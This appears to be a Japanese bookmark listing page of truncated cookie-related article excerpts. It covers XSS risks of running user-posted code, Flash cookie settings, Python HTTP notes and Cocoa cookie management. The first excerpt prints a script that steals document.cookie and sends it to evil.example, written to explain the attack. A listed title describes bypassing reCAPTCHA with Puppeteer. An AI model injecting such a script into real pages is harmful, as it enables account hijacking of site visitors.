ユーザー投稿のコードをブラウザ上で他人が動かせるサービスを作るときのセキュリティについて
問題1: 他ユーザーの認証情報にアクセスできてしまう 投稿されたコードを普通にサイト内に埋め込むとXSSがやり放題な状態になります。 認証CookieのHttpOnlyが無効になっている場合 ユーザーがたくさん集まる超面白いゲームを作り、その中に以下のようなコードをしれっと含めると、そのゲームを開いたユーザーのアカウントの乗っ取りが可能になります。 <script> // 1. Cookieを取得 const stolen = document.cookie; // 2. 攻撃者のサーバーに送信 const img = new Image(); img.src = "https://evil.example/steal?cookie=" + encodeURIComponent(stolen); </script> CookieのHttpOnly属性が無効になっていると、スクリプトからCo
Flashのセキュリティ設定 – Flash Cookie
Last Updated on: 2009年2月10日Flash Playerの設定はAdobe(Macromedia)のページで行う事は、Web開発者には常識だと思います。このブログをあまり一般的なユーザが見ている、とは思えませんが一般ユーザ向けに書いています。 Flashの設定は以下のWebページから行います。 Flashセキュリティ設定のページ(MomongaLinux x86_64+Flash10 Alpha) http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager03.html デフォルトで「サードパーティ製のFlashコンテンツにコンピュータ上のデータを格納する事を許可します」にはチェックが入っています。 これはFlash Cookie(ローカル共有オブジェクト –
HTTP系のPOST,プロクシ(Proxy),クッキー(Cookie),ヘッダ書き換えなんかのメモ - Passing days
HTTPリクエストでPOSTを使う方法 import urllib import urllib2 post_data = {} post_data['email'] = 'hoge@hoge.com' # エンコード en_post_data = urllib.urlencode(post_data) # リクエスト r = urllib2.urlopen('http://hoge.com/',en_post_data) # urllib.urlopenも同じ # build_openerも同様 opener = urllib2.build_opener() r = opener.open('http://hoge.com/',en_post_data) ようするに、urlopen()やopen()の第2パラメタにデータを渡せばPOSTしてくれる。 プロクシ経由でHTTPリクエストを行う方
2008-12-02 - まったり開発情報Blog - CocoaアプリでCookieを独自に管理する
CocoaのURL Loading Systemは通常、HTTP Cookieを自動的に管理してくれる。CookieはNSHTTPCookieというクラスにラップされ、NSHTTPCookieStorageというクラスがそれを溜め込んで自動的にどうこうしてくれる。しかし困るのは、CocoaのCookieはNSHTTPCookieStorageを使う限り全アプリで共通だということだ。URL Loading Systemを直接叩くアプリでなくても、ちょっとWebKitを使ってWebページを表示するだけのアプリでも同様である。Safariで何かのログイン状態をCookieが保持していたら、Thousandでもそのままログインしていたりする、つまりはそういうことで困るのだ*1。 では独自にCookieを管理したいときはどうすればいいのか。NSURLRequest に次のようなメソッドがある。 -(
Plugins | jQuery Plugins
Can't find a Plugin you are looking for? Check out the jQuery Wiki page. Are you a plugin developer? Please move your plugin over to this site.
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Find Chrome Cookies on Mac: Unlocking the Mystery in Seconds | 2024
【Puppeteer実用講座】Puppeteer操作だけでreCAPTCHA v2は突破したときの話〜クッキー活用編
page.setCookie has no effect · Issue #1342 · puppeteer/puppeteer
